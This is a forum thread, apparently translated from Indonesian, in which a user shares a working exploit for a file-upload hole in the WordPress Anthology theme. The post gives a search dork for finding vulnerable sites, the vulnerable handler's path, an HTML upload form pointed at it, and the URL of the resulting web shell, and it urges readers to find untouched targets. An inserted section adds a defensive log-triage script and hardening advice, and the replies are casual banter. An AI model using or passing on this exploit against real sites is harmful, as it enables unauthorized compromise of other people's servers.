BackBox Indonesia
Exploit WordPress Anthology Themes Remote File Upload Vulnerability - Printable Version




Exploit WordPress Anthology Themes Remote File Upload Vulnerability - Nue Bhandell - 03-10-2016

Hello, good evening gang, is anyone still alive this late at night? lol  :D
Just sharing an old exploit for fun, maybe it still works, haha.
Those who are already masters, step aside for now, babe  :heart:

Moving on.

inurl:/wp-content/themes/Anthology/
(develop the rest yourselves, use your imagination, so you can find ones that are vuln and untouched).

exploit: /wp-content/themes/Anthology/functions/upload-handler.php

Signs that it's vuln o.O ?
An error or a blank page appears *roughly like that, sorry if I'm wrong, haha

[Image: a3vN8Ln.png]

Copy the CSRF upload script:

<form enctype="multipart/form-data" 
action="target.co.li/wp-content/themes/Anthology/functions/upload-handler.php" method="post">
Please choose a file: <input name="pexetofile" type="file" /><br />
<input type="submit" value="upload" />

</form>


Once you have opened the CSRF upload form, upload your file/shell.
If the upload succeeds, the name of your file/shell will appear, gang :3

[Image: TqGjVFQ.png]

Shell access: target.co.li/wp-content/uploads/[year]/[month]/namashell.php

[Image: necnt7I.png]

Done x_O

Visit my blog too, gang: TKJ Cyber Art


Source


Hope it's useful, gang, sorry if the post is lame  :)
Time for Nue and the Katakan Putus team to head off, gang, because there are still school exams tomorrow, lol.
bye ..
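
From the defender's side, the two requests described in this post (the POST to the theme's upload handler, then a request for a PHP file under wp-content/uploads) leave a recognizable trail in the web server access log. The following is an added example, not part of the original post: a small Python triage script for that trail. The "combined" log format, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Paths taken from the post; the log format (Apache/nginx "combined") is an assumption.
UPLOAD_HANDLER = "/wp-content/themes/Anthology/functions/upload-handler.php"
UPLOADED_PHP = re.compile(r"^/wp-content/uploads/\d{4}/\d{2}/[^/?]+\.ph(p\d?|tml)(\?|$)", re.I)
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2016:18:01:12 +0700] "GET /wp-content/themes/Anthology/functions/upload-handler.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2016:18:02:40 +0700] "POST /wp-content/themes/Anthology/functions/upload-handler.php HTTP/1.1" 200 31 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2016:18:03:05 +0700] "GET /wp-content/uploads/2016/03/example.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Mar/2016:18:04:00 +0700] "GET /wp-content/uploads/2016/03/photo.jpg HTTP/1.1" 200 80211 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Mar/2016:18:05:00 +0700] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

def triage(log_text):
    """Return findings as (severity, ip, timestamp, reason) tuples, in log order."""
    findings, posted = [], defaultdict(bool)
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, ts, method, path = m["ip"], m["ts"], m["method"], m["path"]
        bare = path.split("?", 1)[0]
        if bare.lower() == UPLOAD_HANDLER.lower():
            if method == "POST":
                posted[ip] = True
                findings.append(("high", ip, ts, "POST to theme upload handler"))
            else:
                findings.append(("low", ip, ts, "probe of theme upload handler"))
        elif UPLOADED_PHP.match(path):
            # PHP should never execute from the media directory.
            sev = "critical" if posted[ip] and m["status"] == "200" else "high"
            findings.append((sev, ip, ts, "PHP requested under uploads/"))
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(*finding, sep=" | ")
```

A PHP request under uploads/ is worth alerting on regardless of which theme is installed. Disabling script execution in wp-content/uploads at the web server removes the second step of the sequence entirely.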


RE: Exploit WordPress Anthology Themes Remote File Upload Vulnerability - anongep - 03-10-2016

comment ^_^ ~


RE: Exploit WordPress Anthology Themes Remote File Upload Vulnerability - Nue Bhandell - 03-10-2016

(03-10-2016, 06:33 PM)anongep Wrote: comment ^_^ ~

hahaha thank you :v


RE: Exploit WordPress Anthology Themes Remote File Upload Vulnerability - kalong404 - 03-11-2016

Missed being the first to reply, bro..


RE: Exploit WordPress Anthology Themes Remote File Upload Vulnerability - Nue Bhandell - 03-11-2016

(03-11-2016, 02:51 AM)kalong404 Wrote: Missed being the first to reply, bro..

hahaha  :D


RE: Exploit WordPress Anthology Themes Remote File Upload Vulnerability - cyber173 - 03-15-2016

yay, the green one ^_^


RE: Exploit WordPress Anthology Themes Remote File Upload Vulnerability - ./EL-Mueeza_23 - 03-27-2016

looks like they've run out of targets :v


RE: Exploit WordPress Anthology Themes Remote File Upload Vulnerability - Nue Bhandell - 03-29-2016

(03-15-2016, 05:55 AM)cyber173 Wrote: yay, the green one ^_^

still loyal to the green one, bro, and IFC  :D haha

(03-27-2016, 05:39 AM)./EL-Mueeza_23 Wrote: looks like they've run out of targets :v

hahaha yes bro, haha  :D
that's all I've found, haha